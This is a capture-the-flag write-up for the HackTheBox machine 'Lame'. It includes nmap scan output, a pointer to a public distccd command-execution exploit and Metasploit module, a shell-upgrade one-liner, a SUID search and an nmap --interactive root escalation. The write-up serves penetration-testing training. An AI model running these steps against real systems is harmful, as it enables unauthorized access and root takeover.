HackTheBox – Lame
difficulty: easy status: retired platform: linux ip: 10.10.10.3 URI: https://www.hackthebox.eu/home/machines/profile/1
Initial aim is to collect as much information about the target host as possible.
--script vuln can be used to list any common vulnerabilities that nmap can discern. It appears that there are multiple services open, with
distccd having a public vulnerability available.
nmap scan results
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 07:40 GMT Nmap scan report for 10.10.10.3 Host is up (0.013s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_sslv2-drown: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:4.7p1: | PACKETSTORM:101052 7.8 https://vulners.com/packetstorm/PACKETSTORM:101052 *EXPLOIT* | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478 | CVE-2008-1657 6.5 https://vulners.com/cve/CVE-2008-1657 | SSV:60656 5.0 https://vulners.com/seebug/SSV:60656 *EXPLOIT* | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755 | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000 | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327 |_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) | distcc-cve2004-2687: | VULNERABLE: | distcc Daemon Command Execution | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2004-2687 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Allows executing of arbitrary commands on systems running distccd 3.1 and | earlier. The vulnerability is the consequence of weak service configuration. | | Disclosure date: 2002-02-01 | Extra information: | | uid=1(daemon) gid=1(daemon) groups=1(daemon) | | References: | https://nvd.nist.gov/vuln/detail/CVE-2004-2687 | https://distcc.github.io/security.html |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 179.11 second
Since it was observed that
distccd is vulnerable and a public exploit is available, this seems like a good path forward. There is also a NSE script that didn't work me sadly.
Exploit: https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 Metasploit: exploit/unix/misc/distcc_exec
This will give a /bin/sh session as user
daemon. The user flag can get obtained via
/home/makis/user.txt. Basic privesc can be used to escalate to root.
python -c "import pty;pty.spawn('/bin/bash')"
Find SUID binaries:
find / -type f -perm -u=s 2>/dev/null
Nmap has SUID bit set. Use this to get an interactive shell as root:
/usr/bin/nmap --interactive !sh cat /root/root.txt